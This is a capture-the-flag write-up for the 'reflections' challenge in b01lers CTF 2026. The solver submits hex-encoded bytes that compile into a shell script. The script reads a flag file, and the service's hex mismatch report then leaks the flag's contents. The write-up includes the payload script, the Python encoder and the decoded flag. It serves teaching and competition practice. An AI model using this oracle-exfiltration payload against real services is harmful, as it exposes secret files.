misc | free | medium


Task: a remote service accepts up to two calc1 compiler submissions and validates each by comparing its stdout to a trusted compiler, printing mismatches in hex. Solution: emit a plain executable shell script instead of a real compiler and use the validation mismatch oracle to leak the flag from stdout.

$ ls tags/ techniques/
mismatch_oracle_exfiltration  executable_script_output  direct_hex_payload_emission

reflections — b01lers CTF 2026

Description

The man in the mirror nods his head

We are given a service that accepts calc1 source, compiles it with the current compiler, marks the result executable, and then runs validation tests against it. The obvious theme is Ken Thompson's “Reflections on Trusting Trust”: upload a compiler, make it become the next trusted compiler, and maybe smuggle a Trojan through the self-hosting chain.

The trick is that we do not need a two-stage trusting-trust backdoor at all. The server itself provides a much simpler oracle: when a validation test fails, it prints both the expected and actual stdout in hex. If we can make the produced executable print the flag, the first failed test leaks it immediately.

Summary

The service processes up to two submissions separated by the raw token &&. Each submission is compiled by /app/compiler_wrapper, which dispatches to /tmp/compiler; initially that symlink points to /app/calc1. The produced file is only required to be executable, not a valid ELF binary, so we can emit a plain shell script that prints the flag.

When the server validates the new "compiler", it computes the expected output with the current trusted compiler and the actual output with our generated executable. On the first mismatch it prints both values as hex, capped at 64 bytes each. Since a normal flag is shorter than that cap, one failing test is enough to exfiltrate the whole flag.

Recon

Relevant files were:

  • server.py
  • compiler_wrapper.c
  • calc1, calc1.he, calc1_compat.c
  • local solve helpers make_payload.py and payload.he

The core flow in server.py is:

  1. Read one submission until raw &&.
  2. Save it as /tmp/temp.he.
  3. Run /app/compiler_wrapper, which executes /tmp/compiler, to build /tmp/calc<random>.
  4. chmod +x the output.
  5. Run many randomized calc1 test cases.
  6. Compute:
    • expected = run_compiler(COMPILER, test_input)
    • actual = run_compiler(new_binary, test_input)
  7. On mismatch, print both expected and actual as hex via format_bytes(..., limit=64).
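The comparison in steps 5 to 7 can be sketched without the real server. This is a minimal model, not the code from server.py: each "compiler" is a plain Python function from stdin bytes to stdout bytes, and the names first_mismatch, trusted_hex, and leaky_candidate are hypothetical.

```python
from typing import Callable, Iterable, Optional, Tuple

# Hypothetical model: a "compiler" maps stdin bytes to stdout bytes.
Compiler = Callable[[bytes], bytes]
Mismatch = Tuple[int, str, bytes, bytes]


def first_mismatch(trusted: Compiler, candidate: Compiler,
                   tests: Iterable[Tuple[str, bytes]]) -> Optional[Mismatch]:
    """Return (index, name, expected, actual) for the first failing test."""
    for index, (name, test_input) in enumerate(tests, start=1):
        expected = trusted(test_input)
        actual = candidate(test_input)
        if actual != expected:
            return index, name, expected, actual
    return None


def trusted_hex(test_input: bytes) -> bytes:
    # Models only the direct-hex mode: "7f 45 4c 46\n" -> b"\x7fELF".
    return bytes.fromhex(test_input.decode("ascii"))


def leaky_candidate(_test_input: bytes) -> bytes:
    # Ignores its input and prints a placeholder secret instead.
    return b"SECRET"


tests = [("direct hex bytes", b"7f 45 4c 46\n")]
mismatch = first_mismatch(trusted_hex, leaky_candidate, tests)
print(mismatch)
```

The point of the model is that actual is entirely attacker-controlled: whatever the candidate writes to stdout is what the mismatch path hands to the reporter.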

Two details matter immediately:

  • CURRENT_COMPILER starts as a symlink to /app/calc1, so the first stage is built by the original compiler.
  • The generated file is just made executable and then run. There is no ELF magic check, so a text script with a shebang is valid.
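The second point is easy to confirm locally. The sketch below assumes a POSIX system with /bin/sh and a temporary directory that allows execution; the file name calc_demo and the echoed string are placeholders, not values from the challenge.

```python
import stat
import subprocess
import tempfile
from pathlib import Path

# Stand-in for the "compiler output": a text file, not an ELF binary.
script = b"#!/bin/sh\necho not-an-elf\n"

with tempfile.TemporaryDirectory() as workdir:
    target = Path(workdir) / "calc_demo"  # hypothetical output name
    target.write_bytes(script)
    # Equivalent of chmod +x on the generated file.
    mode = target.stat().st_mode
    target.chmod(mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    # Run it the way a validator would: feed a test case on stdin.
    result = subprocess.run([str(target)], input=b"7f 45 4c 46\n",
                            capture_output=True, check=True)
    output = result.stdout

print(output)
```

The kernel recognises the `#!` line and hands the file to the named interpreter, so the file runs even though it has no ELF header, and the test input on stdin is simply ignored.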

Root Cause

The challenge steers us toward self-reproducing compilers and trusting-trust style persistence, but the validation layer exposes a stronger primitive than that design requires.

The bug is an information leak through the mismatch reporter:

    if actual != expected:
        print(
            f"Test {test_index} ({test_name}) failed. "
            f"Expected: {format_bytes(expected)}, Got: {format_bytes(actual)}"
        )

That turns every failed test into a controlled stdout oracle. Since actual is taken from executing our produced file, we can choose what gets printed. Because the output is hex-encoded and truncated only after 64 bytes, a short secret such as bctf{...} fits comfortably.
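To see how much the cap actually protects, here is a guess at what format_bytes does. The real helper was not reproduced in this writeup, so the body below is an assumption: hex-encode at most limit bytes and drop the rest.

```python
def format_bytes(data: bytes, limit: int = 64) -> str:
    # Assumed behaviour: hex-encode at most `limit` bytes, drop the rest.
    return data[:limit].hex()


short_secret = b"A" * 26   # same length as a typical short flag
long_secret = b"B" * 100   # longer than the cap

short_leak = bytes.fromhex(format_bytes(short_secret))
long_leak = bytes.fromhex(format_bytes(long_secret))

print(len(short_leak), short_leak == short_secret)
print(len(long_leak), long_leak == long_secret)
```

Under that assumption a 26-byte secret comes back whole, while a 100-byte one loses everything past byte 64.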

So instead of building a malicious compiler that survives into a second stage, we can submit calc1 source that directly emits an executable script whose stdout is the flag. The very first validation test leaks it.

Exploit

1. Emit a script, not a real compiler

The payload script was:

    #!/bin/sh
    cat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt

This works because the server only requires the built output file to be executable. A shell script with a valid shebang satisfies that requirement.

2. Encode the script as raw calc1 hex bytes

The original compiler accepts direct hex bytes, so the calc1 source was simply the raw byte stream of the script, formatted as hex pairs. The local helper used during the solve was:

    #!/usr/bin/env python3
    from pathlib import Path

    script = b"#!/bin/sh\ncat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt\n"

    hex_lines = []
    for i in range(0, len(script), 16):
        chunk = script[i:i + 16]
        hex_lines.append(" ".join(f"{b:02x}" for b in chunk))

    payload = "\n".join(hex_lines) + "\n"
    Path("payload.he").write_text(payload)
    print(payload, end="")
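A quick local sanity check is to decode the hex source back into bytes and compare it with the script. The sketch assumes that the direct-hex mode treats whitespace-separated hex pairs as raw output bytes, which is what the 7f 45 4c 46 test case suggests; encode_hex_source and decode_hex_source are hypothetical helper names.

```python
script = b"#!/bin/sh\ncat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt\n"


def encode_hex_source(data: bytes, width: int = 16) -> str:
    """Format bytes as lines of space-separated hex pairs."""
    lines = [
        " ".join(f"{b:02x}" for b in data[i:i + width])
        for i in range(0, len(data), width)
    ]
    return "\n".join(lines) + "\n"


def decode_hex_source(source: str) -> bytes:
    """Assumed model of direct-hex mode: each hex pair becomes one byte."""
    return bytes(int(token, 16) for token in source.split())


payload = encode_hex_source(script)
round_trip = decode_hex_source(payload)
print(round_trip == script)
print(payload.splitlines()[0])
```

If the round trip fails locally, the file produced on the server would not be the intended script either.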

3. Respect the && token parser

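server.py splits submissions on the raw bytes &&, so that delimiter must not appear anywhere inside the submitted source. The hex-encoded payload contains only hex digits and whitespace, so it cannot collide with the delimiter; the script itself also uses || rather than &&.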

To make the service process and close cleanly during the solve, the final submission was:

<contents of payload.he> && &&

That gives the first real stage followed by an empty second stage. The second stage later causes an exec format error, but that happens only after the flag has already been leaked. It is incidental, not part of the core exploit.
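The framing can be modelled as follows. This is a sketch of a reader that consumes bytes up to the next raw && token, not the parser from server.py; read_submission and the shortened wire bytes are illustrative only.

```python
import io

DELIMITER = b"&&"


def read_submission(stream: io.BufferedIOBase) -> bytes:
    """Read bytes up to (not including) the next raw && token, or EOF."""
    buf = bytearray()
    while not buf.endswith(DELIMITER):
        byte = stream.read(1)
        if not byte:  # EOF before a delimiter was seen
            break
        buf += byte
    if buf.endswith(DELIMITER):
        del buf[-len(DELIMITER):]
    return bytes(buf)


# Shortened stand-in for "<contents of payload.he> && &&".
wire = io.BytesIO(b"23 21 2f 62\n&&\n&&\n")
stages = [read_submission(wire) for _ in range(2)]
print(stages)

# A raw && inside the source would cut the first stage short.
broken = read_submission(io.BytesIO(b"echo a && echo b\n&&"))
print(broken)
```

In this model the first stage is the hex payload and the second stage is whitespace only, which matches the empty second stage described above.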

Recovering the Flag

The first validation case is direct hex bytes with input 7f 45 4c 46\n, so the trusted compiler outputs the bytes 7f454c46 (\x7fELF). Our script ignores stdin and prints the flag instead, causing an immediate mismatch.

The service response included:

Test 1 (direct hex bytes) failed. Expected: 7f454c46, Got: 626374667b5768305f77316c6c5f495f74727573375f4e30777d

Decoding the Got field from hex gives:

bctf{Wh0_w1ll_I_trus7_N0w}

This is comfortably below the 64-byte leak cap, so no multi-request reconstruction was needed.
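The decoding step is a one-liner in Python; the hex string is copied from the service response above.

```python
got_field = "626374667b5768305f77316c6c5f495f74727573375f4e30777d"

flag = bytes.fromhex(got_field).decode("ascii")
print(flag)       # bctf{Wh0_w1ll_I_trus7_N0w}
print(len(flag))  # 26, well under the 64-byte cap
```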

Lessons Learned

  • A trusting-trust theme does not matter if the service leaks attacker-controlled stdout before any persistence is needed.
  • If a generated file is only required to be executable, a shebang script is often enough; ELF generation may be unnecessary.
  • Hex-encoded mismatch output is still an oracle. Truncation only helps if the secret is longer than the cap.
  • Token-based framing can break payloads in surprising ways; here raw && inside the source would have split the submission.
  • The empty second stage and its exec format error were incidental; they occurred only after the flag had already been recovered.
